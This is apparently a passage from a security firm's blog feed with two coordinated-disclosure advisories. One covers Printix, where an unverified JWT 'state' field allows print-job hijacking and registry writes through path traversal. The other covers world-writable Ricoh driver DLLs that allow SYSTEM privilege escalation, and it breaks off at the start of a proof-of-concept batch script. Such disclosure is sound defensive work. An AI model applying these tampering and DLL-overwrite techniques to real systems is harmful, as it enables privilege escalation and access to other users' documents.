&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-30" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-30" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-30"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix UI Communication, TCP" protocol=TCP dir=out localport=21338 action=allow
&lt;a id="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-31" name="rest_code_736ace5d7db94b3db7f8d5f76e9077d8-31" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_736ace5d7db94b3db7f8d5f76e9077d8-31"&gt;&lt;/a&gt;netsh advfirewall firewall add rule name="Printix IPP Print, TCP" protocol=TCP dir=out localport=21339 action=allow
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;The script seems to have been run during the standard installation on the tested device
as the configured rules can also be seen when checking Windows Firewall settings.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-1"&gt;
&lt;h4&gt;Precondition&lt;/h4&gt;
&lt;p&gt;An attacker has access to the system and is able to run an application to communicate through one of the opened ports
without being detected by an installed Antivirus application.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="incomplete-jwt-validation-allows-receiving-printed-documents-of-other-users"&gt;
&lt;h3&gt;3. Incomplete JWT validation allows receiving printed documents of other users&lt;/h3&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N, 6.5 Medium&lt;/pre&gt;
&lt;p&gt;The login mechanism to Printix via the Printix Client is not verifying the signature of a JSON Web Token (JWT) that is used to transmit data to the server.
That enables tampering of the data that is sent, such as which user is being logged in. Printix uses user-specified data to construct a Windows Registry path for storing printing-related configuration.&lt;/p&gt;
&lt;section id="impact-3"&gt;
&lt;h4&gt;Impact&lt;/h4&gt;
&lt;p&gt;A manipulated user information in the JWT leads to a manipulated Windows registry path. An attacker can use this vulnerability to modify printer configuration and to receive printed documents of other users.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details-2"&gt;
&lt;h4&gt;Technical details&lt;/h4&gt;
&lt;p&gt;Printix is a cloud printing solution that was installed on endpoints in a tested environment. Users could sign into Printix using their Microsoft accounts by clicking onto the system tray icon of Printix and then selecting the Sign in button.&lt;/p&gt;
&lt;p&gt;When doing that, a browser window is opened for the URL &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;sign-in.printix.net&lt;/span&gt;&lt;/code&gt;. Several URL parameters are added as well, with one of them being a JSON Web Token as shown below.&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;Source&lt;/strong&gt;: Example login URL&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_33db684c6e474a54a29c3826a471ae3c-1" name="rest_code_33db684c6e474a54a29c3826a471ae3c-1" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_33db684c6e474a54a29c3826a471ae3c-1"&gt;&lt;/a&gt;https://auth.printix.net/oauth/authorize/tenant/&amp;lt;tenant_id&amp;gt;?response_type=code&amp;amp;client_id=PrintixClient&amp;amp;client_secret=&amp;lt;secret&amp;gt;&amp;amp;state=&amp;lt;username&amp;gt;&amp;amp;redirect_uri=http
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;&lt;strong&gt;Source&lt;/strong&gt;: Decoded JWT Content&lt;/p&gt;
&lt;div class="code"&gt;&lt;pre class="code text"&gt;&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-1" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-1" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-1"&gt;&lt;/a&gt;{
&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-2" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-2" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-2"&gt;&lt;/a&gt; "tenantID": "&amp;lt;tenant_id&amp;gt;",
&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-3" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-3" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-3"&gt;&lt;/a&gt; "state": "user2",
&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-4" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-4" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-4"&gt;&lt;/a&gt; "prompt": "login",
&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-5" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-5" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-5"&gt;&lt;/a&gt; "client_id": "PrintixClient",
&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-6" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-6" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-6"&gt;&lt;/a&gt; "SPRING_SECURITY_SAVED_REQUEST": {
&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-7" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-7" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-7"&gt;&lt;/a&gt;     "requestUrl": "https:\/\/auth.printix.net:443\/oauth\/authorize\/tenant\/&amp;lt;tenant_id&amp;gt;?response_type=code&amp;amp;client_id=PrintixClient&amp;amp;client_secret=1234&amp;amp;state=user2&amp;amp;redirect_uri=http:\/\/localhost:21339\/oauth\/authorize&amp;amp;prompt=login",
&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-8" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-8" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-8"&gt;&lt;/a&gt;     "queryString": "response_type=code&amp;amp;client_id=PrintixClient&amp;amp;client_secret=1234&amp;amp;state=user2&amp;amp;redirect_uri=http:\/\/localhost:21339\/oauth\/authorize&amp;amp;prompt=login" }
&lt;a id="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-9" name="rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-9" href="https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/#rest_code_a6d749c5f4eb426fb9d4b8a6a4571c7a-9"&gt;&lt;/a&gt; }
&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;Usually, all these attributes of the payload cannot be modified, as servers also check the signature that is part of the JWT.
In the case of Printix however, this signature is not verified at all.
The signature can be replaced with any text and the server will still accept the token as valid.&lt;/p&gt;
&lt;p&gt;When changing the state attribute to the value of another user (user B), and replacing it with the original JWT in the URL-Parameter,
but afterwards signing in to Printix with the original Microsoft credentials (user A), the sign-in is confirmed by Printix.&lt;/p&gt;
&lt;p&gt;The Printix Service running on the system will, after signing in, replace the registry entries of the user B with the username of user A.
The consequence is that whenever user B prints a document, it will appear in the Printix online queue of user A.&lt;/p&gt;
&lt;p&gt;Further investigation with tampering of the JWT revealed that this also enables an attacker to write new registry keys
with &lt;code class="docutils literal"&gt;SYSTEM&lt;/code&gt; privileges to different places.
When passing a path traversal, e.g. &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;..\\..\\foobar&lt;/span&gt;&lt;/code&gt; (escaped back-slashed), in the state field of the JWT, the Printix service will create registry keys at that location.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="precondition-2"&gt;
&lt;h4&gt;Precondition&lt;/h4&gt;
&lt;p&gt;An attacker has access to the system and the targeted user also has an account on the same machine and prints a document.&lt;/p&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;/section&gt;
&lt;section id="recommendation"&gt;
&lt;h2&gt;Recommendation&lt;/h2&gt;
&lt;p&gt;Pentagrid recommends installing security fixes once updates are provided by Printix. According to Printix, issues will be fixed in release 1.3.1169. However, this version has not been tested again.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;These vulnerabilities have been found by Ole Diederich (Pentagrid).&lt;/p&gt;
&lt;!-- Hiring --&gt;
&lt;!-- - - - - - - - --&gt;
&lt;!--  --&gt;
&lt;!-- To extend our technical team at Pentagrid, we are looking for talented people with an interest in new things, passion for technology and commitment. Currently, we are looking for `Junior and Senior IT Security Analysts in Berlin and Buchs SG &lt;link://slug/career&gt;`_. --&gt;
&lt;/section&gt;</description><category>Advisory</category><category>Exploit</category><guid>https://www.pentagrid.ch/en/blog/vulnerabilities-in-printix-cloud-print-management/</guid><pubDate>Thu, 18 Aug 2022 07:42:00 GMT</pubDate></item><item><title>Local Privilege Escalation in many Ricoh Printer Drivers for Windows (CVE-2019-19363)</title><link>https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/</link><dc:creator>Pentagrid AG</dc:creator><description>&lt;p&gt;Pentagrid has been asked to  manage the coordinated disclosure process
for a vulnerability that affects several Windows printer drivers for a
wide  range of  printers  by  the printer  manufacture  Ricoh. Due  to
improperly  set  file permissions  of  file  system entries  that  are
installed when a printer is added  to a Windows system, any local user
is able to overwrite program library files (DLLs) with own code.&lt;/p&gt;
&lt;!-- TEASER_END --&gt;
&lt;section id="impact"&gt;
&lt;h2&gt;Impact&lt;/h2&gt;
&lt;p&gt;The improperly  protected library  files are  loaded by  the Windows
&lt;code class="docutils literal"&gt;PrintIsolationHost.exe&lt;/code&gt;,  which  is  a privileged  process  running  as
&lt;code class="docutils literal"&gt;SYSTEM&lt;/code&gt;. When an attacker overwrites library  files that are used in an
administrative   context,  the   library  code   gets  executed   with
administrative  privileges as  well.  Thus, the  attacker  is able  to
escalate privileges to &lt;code class="docutils literal"&gt;SYSTEM&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;As installing printers is not disallowed by  default on Domain
managed Windows computers,  this can be used as  a universal privilege
escalation as  long as  the vulnerable printer  drivers are  valid and
installed.&lt;/p&gt;
&lt;pre class="literal-block"&gt;CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H, 8.8 High&lt;/pre&gt;
&lt;/section&gt;
&lt;section id="timeline"&gt;
&lt;h2&gt;Timeline&lt;/h2&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;2019-10-17: Pentagrid has been asked to support the disclosure process, because the source was not successful in reporting this vulnerability to Ricoh.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-10-23: Asked @ricoheurope Twitter channel regarding a security contact. No response, yet.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-10-29: Successfully established a contact with a Ricoh employee via LinkedIn. Other contact attempts via LinkedIn failed so far.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-10-29: Asked @AskRicoh Twitter channel regarding a security contact.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-10-31: Received two e-mail addresses as potential security contacts via LinkedIn contact.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-11-02: Initial contact with provided two Ricoh e-mail addresses.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-11-04: Received PSIRT contact address (&lt;a class="reference external" href="mailto:psirt@ricoh-usa.com"&gt;psirt@ricoh-usa.com&lt;/a&gt;).&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-11-05: Sent preliminary advisory to PSIRT.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-11-05: @AskRicoh responded on Twitter.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-11-14: Response from Ricoh PSIRT with a timeline proposal and intended steps.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2019-12-05: CVE-2019-19363 has been assigned.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2020-01-22: Ricoh published an &lt;a class="reference external" href="https://www.ricoh.com/info/2020/0122_1/"&gt;advisory&lt;/a&gt;. Fixes and mitigations have not been verified, yet.&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;2020-01-22: Advisory updated and published after 90 days of initial contact.&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;/section&gt;
&lt;section id="affected-components"&gt;
&lt;h2&gt;Affected Components&lt;/h2&gt;
&lt;p&gt;Printer  drivers  for  Ricoh,  Savin and  Lanier  printer  brands  are
affected.  The  following drivers  for  Windows  10  are known  to  be
affected:&lt;/p&gt;
&lt;ul class="simple"&gt;
&lt;li&gt;&lt;p&gt;SP 8300DN - PCL6 Driver for Universal Print, Ver.4.23.0.0,
release date 10/08/2019: &lt;a class="reference external" href="http://support.ricoh.com/bb/pub_e/dr_ut_e/0001315/0001315878/V42300/z87179L19.exe"&gt;http://support.ricoh.com/bb/pub_e/dr_ut_e/0001315/0001315878/V42300/z87179L19.exe&lt;/a&gt;
(SHA-256 064c1db754d43edbd8c9c23185b817d6 a29775c93c1049605f5d907a472d64ab)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;SP 8300DN - PCL 6 Driver, Ver.1.5.0.0, release date 07/03/2016:
&lt;a class="reference external" href="http://support.ricoh.com/bb/pub_e/dr_ut_e/0001294/0001294259/V1500/z75198L13.exe"&gt;http://support.ricoh.com/bb/pub_e/dr_ut_e/0001294/0001294259/V1500/z75198L13.exe&lt;/a&gt;
(SHA-256 af2fa42905850f58879816956d322dc5 adfb1f89fbe7f6af830f465fbc0e3cc1)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;P 501/502 - PCL 6 Driver, Ver.1.1.0.0, release date 03/02/2019:
&lt;a class="reference external" href="http://support.ricoh.com/bb/pub_e/dr_ut_e/0001311/0001311756/V1100/z84997L16.exe"&gt;http://support.ricoh.com/bb/pub_e/dr_ut_e/0001311/0001311756/V1100/z84997L16.exe&lt;/a&gt;
(SHA-256  564b27f16db12cafd15eec6057c75b3 0dbac25dbbebb4fd5598ad09dfaaad416)&lt;/p&gt;&lt;/li&gt;
&lt;li&gt;&lt;p&gt;MP C8003/C6503 series - PCL 6 Driver, Ver.1.2.0.0, release date 24/05/2017:
&lt;a class="reference external" href="http://support.ricoh.com/bb/pub_e/dr_ut_e/0001303/0001303915/V1200/z80159L15.exe"&gt;http://support.ricoh.com/bb/pub_e/dr_ut_e/0001303/0001303915/V1200/z80159L15.exe&lt;/a&gt;
(SHA-256  3ef2a1dc09e2dde71ed9db9f6c629ff 0140d172fbe71c9e376d391e3162090f0)&lt;/p&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Especially the Universal Print driver supports a wide range of printer
models. Furthermore, printers are also  marketed under the brand names
Savin and Lanier, which use  the same drivers.  Ricoh's advisory
&lt;a class="reference external" href="https://www.ricoh.com/info/2020/0122_1/list"&gt;lists affected drivers and versions&lt;/a&gt;.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="technical-details"&gt;
&lt;h2&gt;Technical Details&lt;/h2&gt;
&lt;p&gt;To reproduce  the vulnerability,  download an affected  printer driver
such  as  the  PCL6  Driver for  Universal  Print,  Version  4.23.0.0,
self-extract the executable file and install the driver. Add a printer. In a standard Windows installation, adding  a printer does not need an
administrator account.&lt;/p&gt;
&lt;p&gt;During  the  printer  setup,  the  process  of  &lt;code class="docutils literal"&gt;PrintIsolationHost.exe&lt;/code&gt;
creates  a directory  &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;c:\ProgramData\RICOH_DRV&lt;/span&gt;&lt;/code&gt;  and installs  several
files in this  location, including several DLL files.   Every user has
full control over the installed DLL files as show below, because these
files are writable:&lt;/p&gt;
&lt;pre class="literal-block"&gt;C:\&amp;gt;icacls "c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\*.dll"
c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\borderline.dll Everyone:(I)(F)
c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\headerfooter.dll Everyone:(I)(F)
c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\jobhook.dll Everyone:(I)(F)
c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\overlaywatermark.dll Everyone:(I)(F)
c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\popup.dll Everyone:(I)(F)
c:\ProgramData\RICOH_DRV\RICOH PCL6 UniversalDriver V4.23\_common\dlz\watermark.dll Everyone:(I)(F)

Successfully processed 6 files; Failed processing 0 files&lt;/pre&gt;
&lt;p&gt;The flag  &lt;code class="docutils literal"&gt;F&lt;/code&gt; means  full access  and the flag  &lt;code class="docutils literal"&gt;I&lt;/code&gt; means  permissions are
inherited  from  the parent  directory.  The  inherited writable  flag
origins  from  a  parent  directory. In  fact,  the  entire  directory
&lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;c:\ProgramData\RICOH_DRV&lt;/span&gt;&lt;/code&gt; grants full control to everyone:&lt;/p&gt;
&lt;pre class="literal-block"&gt;C:\&amp;gt;icacls "c:\ProgramData\RICOH_DRV"
c:\ProgramData\RICOH_DRV Everyone:(OI)(CI)(F)

Successfully processed 1 files; Failed processing 0 files&lt;/pre&gt;
&lt;p&gt;Here &lt;code class="docutils literal"&gt;OI&lt;/code&gt; means Object Inherit, &lt;code class="docutils literal"&gt;CI&lt;/code&gt;  Container Inherit, and &lt;code class="docutils literal"&gt;F&lt;/code&gt; full access
as above.&lt;/p&gt;
&lt;p&gt;The &lt;a class="reference external" href="https://docs.microsoft.com/en-us/windows-hardware/drivers/print/printer-driver-isolation"&gt;printer isolation feature&lt;/a&gt; has been introduced in Windows 7 and Windows Server 2008 to not have the printer drivers in the same process as the spooler. The isolation should add stability for other user's print jobs.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="exploitation"&gt;
&lt;h2&gt;Exploitation&lt;/h2&gt;
&lt;p&gt;When a  DLL file from  the &lt;code class="docutils literal"&gt;&lt;span class="pre"&gt;c:\ProgramData\RICOH_DRV&lt;/span&gt;&lt;/code&gt; is  overwritten in
the  right  moment by  a  local  attacker, the  &lt;code class="docutils literal"&gt;PrintIsolationHost.exe&lt;/code&gt;
process  loads  the  attacker-provided  DLL   file  as  shown  in  the
screenshot  below.  Afterward, the  library  code  gets executed  with
&lt;code class="docutils literal"&gt;SYSTEM&lt;/code&gt;  privileges,  because  the &lt;code class="docutils literal"&gt;PrintIsolationHost.exe&lt;/code&gt;  uses  &lt;code class="docutils literal"&gt;SYSTEM&lt;/code&gt;
privileges. This attack  idea  has  been implemented  in  a proof  of
concept exploit that is given in a later section of this advisory.&lt;/p&gt;
&lt;img alt="/images/202001_Ricoh_Privilege_Escalation_Screenshot_Procmon_PoC_in_action.png" src="https://www.pentagrid.ch/images/202001_Ricoh_Privilege_Escalation_Screenshot_Procmon_PoC_in_action.png"&gt;
&lt;/section&gt;
&lt;section id="precondition"&gt;
&lt;h2&gt;Precondition&lt;/h2&gt;
&lt;p&gt;To exploit  the vulnerability, an  attacker needs access to  a Windows
host as a regular  user and must be able to  install an affected Ricoh
printer driver as  well as to add printers. Adding printers is usually possible without administrative access.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="patches-and-workaround"&gt;
&lt;h2&gt;Patches and Workaround&lt;/h2&gt;
&lt;p&gt;Please  refer  to  Ricoh's   advisory  for  mitigations  and  security
patches. Please refer to &lt;a class="reference internal" href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#updates"&gt;Updates&lt;/a&gt; below.&lt;/p&gt;
&lt;p&gt;Windows  Group  policies  are  a  potential  workaround.   When  group
policies  are used,  there is  a  group policy  to control  installing
printer  drivers  (Windows  Settings  -&amp;gt; Security  Settings  -&amp;gt;  Local
Policies -&amp;gt; Security Options -&amp;gt; Devices: Prevent Users From Installing
Printer Drivers) and  another group policy to  control adding printers
(User Configuration  -&amp;gt; Administrative  Templates -&amp;gt; Control  Panel -&amp;gt;
Printers -&amp;gt;  Prevent addition of  printers). When used,  people cannot
install drivers, respectively adding printers.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="credits"&gt;
&lt;h2&gt;Credits&lt;/h2&gt;
&lt;p&gt;This  vulnerability has  been  found by  Alexander  Pudwill, who  also
provided  an initial  proof of  concept  exploit in  C#. Pentagrid  AG
independently  validated the  findings,  fully  automated the  exploit
process and handled the coordinated disclosure.&lt;/p&gt;
&lt;/section&gt;
&lt;section id="proof-of-concept-exploit"&gt;
&lt;h2&gt;Proof of Concept Exploit&lt;/h2&gt;
&lt;section id="launch-script"&gt;
&lt;h3&gt;1. Launch Script&lt;/h3&gt;
&lt;div class="code"&gt;&lt;table class="codetable"&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-1"&gt;&lt;code data-line-number=" 1"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-1" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-1"&gt;&lt;/a&gt;&lt;span class="c1"&gt;REM This example batch script executes the proof of concept exploit.&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-2"&gt;&lt;code data-line-number=" 2"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-2" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-2"&gt;&lt;/a&gt;&lt;span class="c1"&gt;REM Written by Pentagrid AG, 2019.&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-3"&gt;&lt;code data-line-number=" 3"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-3" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-3"&gt;&lt;/a&gt;&lt;span class="c1"&gt;REM See https://pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-4"&gt;&lt;code data-line-number=" 4"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-4" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-4"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-5"&gt;&lt;code data-line-number=" 5"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-5" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-5"&gt;&lt;/a&gt;&lt;span class="k"&gt;SET&lt;/span&gt; &lt;span class="nv"&gt;DLL&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;watermark.dll
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-6"&gt;&lt;code data-line-number=" 6"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-6" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-6"&gt;&lt;/a&gt;&lt;span class="k"&gt;SET&lt;/span&gt; &lt;span class="nv"&gt;STEPS&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;2
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-7"&gt;&lt;code data-line-number=" 7"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-7" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-7"&gt;&lt;/a&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-8"&gt;&lt;code data-line-number=" 8"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-8" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-8"&gt;&lt;/a&gt;&lt;span class="k"&gt;SET&lt;/span&gt; &lt;span class="nv"&gt;PRINTERNAME&lt;/span&gt;&lt;span class="p"&gt;=&lt;/span&gt;RICOH PCL6 UniversalDriver V4.23
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-9"&gt;&lt;code data-line-number=" 9"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-9" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-9"&gt;&lt;/a&gt;&lt;span class="c1"&gt;REM SET PRINTERNAME=RICOH Aficio SP 8300DN PCL 6&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-10"&gt;&lt;code data-line-number="10"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-10" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-10"&gt;&lt;/a&gt;&lt;span class="c1"&gt;REM SET PRINTERNAME=RICOH P 501 PCL 6&lt;/span&gt;
&lt;/code&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td class="linenos linenodiv"&gt;&lt;a href="https://www.pentagrid.ch/en/blog/local-privilege-escalation-in-ricoh-printer-drivers-for-windows-cve-2019-19363/#rest_code_ea66689cbaee42d993d9cf728860c5e2-11"&gt;&lt;code data-line-number="11"&gt;&lt;/code&gt;&lt;/a&gt;&lt;/td&gt;&lt;td class="code"&gt;&lt;code&gt;&lt;a id="rest_code_ea66689cbaee42d993d9cf728860c5e2-11" name="rest_code_ea66689cbaee42d993d9cf728860c5e2-11"&gt;&lt;/a&gt;&lt;span class="c1"&gt;REM SET PRINTERNAME=RICOH MP C6503 PCL 6&lt;/span&gt;
